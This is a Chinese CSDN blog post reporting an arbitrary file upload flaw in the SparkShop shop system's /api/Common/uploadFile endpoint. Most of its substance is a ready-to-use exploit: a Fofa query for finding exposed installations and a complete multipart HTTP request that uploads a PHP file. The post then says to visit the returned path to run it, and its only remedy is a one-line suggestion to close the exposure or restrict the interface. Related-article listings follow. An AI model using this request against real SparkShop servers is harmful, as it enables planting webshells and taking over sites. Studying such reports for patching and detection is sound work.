SparkShop任意文件上传

于 2024-08-25 15:13:47 发布
阅读量47 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141529423
版权

0x01 漏洞描述:

SparkShop(星火商城)是基于thinkphp6 + elementui的开源免费可商用的高性能商城系统。uploadFile中没有对上传文件进行校验导致任意文件上传,可执行shell脚本进一步利用。

0x02 搜索语句:

Fofa:"SparkShop"

0x03 漏洞复现:

POST /api/Common/uploadFile HTTP/2
Host: your-ip
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Length: 178

------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="file";filename="1.php"

<?php echo"hello world";?>
------WebKitFormBoundaryj7OlOPiiukkdktZR--

根据回显地址拼接访问

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sparkshop-master.zip
06-28
Sparkshop Master:深入理解SpringMVC MVC框架》 Sparkshop-master.zip是一个包含SpringMVC基础及MVC框架项目的源码压缩包,专为初学者设计,旨在提供一个全面的学习平台,帮助他们深入理解MVC架构及其在实际开发...
SparkShop开源可商用小程序H5和PC端带分销功能
10-29
星火商城)B2C商城是基于thinkphp6 + elementui的开源免费可商用的高性能商城系统;包含小程序商城、H5商城、公众号商城、PC商城、App,支持页面diy、秒杀、优惠券、积分、分销、会员等级。营销功能采用插件化的方式...
【漏洞复现】云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(2)
2401_84972703的博客
05-13 337
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SparkShop小程序商城系统 支持多端,并带有分销功能
软希网分享源码的博客
11-22 115
SparkShop小程序商城系统 支持多端,并带有分销功能
SparkShop开源商城系统v1.1.3发布
BIGGUA的博客
06-11 76
SparkShop 前端采用 uniapp 编写,因此一套代码可以分别编译为 APP、h5、小程序,此次更新是针对 APP 下不兼容的写法做兼容,从而实现可以编译成一个可用的 APP。目前仅针对安卓进行了编译调试,IOS 尚未做出调整可能会出现问题。完成app端的基本适配,可以编译生成安卓app。管理后台管理员自己修改密码。秒杀多规格商品主图显示问题。了解更多的时时更新动态。此次更新属于小版本更新。
SparkShop PRO 版本 v1.2.4 - 付费会员
BIGGUA的博客
12-19 81
之前系统内已经有了会员功能,不过原来的会员是通过用户购买东西,实现经验和等级的增长,从而获得更高的等级获取更多的权益。本次更新的付费会员功能,玩法如同京东的PLUS 会员,任意设置会员的有效期限,和权益范围,用户购买了该会员,就可以享受相应的权益,同时还可以给商品设置会员价格,会员就可以享受该价格。包邮、折扣、积分回馈。设置好的会员,可以在前端,用户选择购买。后台任意设置会员的类型,同时预设的3个权益,可以设置。增加了系统的趣味性和营销性,提升用户粘度。同时商品的页面,也会显示它专属的会员价格。
基于ThinkPHP 6和ElementUI的SparkShop B2C商城系统设计源码
04-10
本项目是一个基于ThinkPHP 6和ElementUI的SparkShop B2C商城系统设计源码,共包含3983个文件,其中包括2706个PHP文件、173个Markdown文件等。系统采用了PHP、HTML、JavaScript、Vue、CSS和Shell等技术,为用户提供了...
SparkShop 商城多端系统,小程序带分销功能,免费开源可商用
12-22
SparkShop (星火商城) B2C 商城是基于 ThinkPHP 6 + ElementUI 的开源免费可商用的高性能商城系统;包含小程序商城、H5 商城、公众号商城、PC 商城、App,支持页面 diy、秒杀、优惠券、积分、分销、会员等级。营销...
SparkShop小程序商城系统 支持多端,并带有分销功能,可用于商业用途
07-29
SparkShop(星火商城)是一个基于ThinkPHP6 + Element UI的开源免费高性能商城系统,可用于商业用途。它包括小程序商城、H5商城、公众号商城、PC商城和App,支持页面DIY、秒杀、优惠券、积分、分销、会员等级等功能...
小程序源码 shop商城 (商城demo源码) (代码源)
06-22
小程序源码 shop商城 (商城demo源码) (代码源)小程序源码 shop商城 (商城demo源码) (代码源)小程序源码 shop商城 (商城demo源码) (代码源)小程序源码 shop商城 (商城demo源码) (代码源)小程序源码 shop商城 (商城...
基于thinkphp6 + elementui的开源免费可商用的高性能商城系统
12-25
SparkShop(星火商城)是基于thinkphp6 + elementui的开源免费可商用的高性能商城系统;包含小程序商城、H5商城、公众号商城、PC商城、App,支持页面diy、秒杀、优惠券、积分、分销、会员等级。营销功能采用插件化的...
网络安全(黑客)自学
白帽子凯哥聊黑客
08-20 741
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
从密码学角度看网络安全:加密技术的最新进展
A526847的博客
08-20 657
在数字化时代,网络安全已成为不可忽视的重大问题。随着计算机技术和网络应用的飞速发展,黑客和网络攻击手段日益复杂,对个人、企业乃至国家的信息安全构成了严重威胁。密码学作为网络安全领域的核心支柱,其发展对于保护信息安全具有至关重要的作用。本文将探讨加密技术的最新进展,以及这些进展如何助力网络安全
网络安全(黑客)——自学2024
2401_84466325的博客
08-21 1558
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-21 1385
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
最新发布
2401_85023531的博客
08-23 1019
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值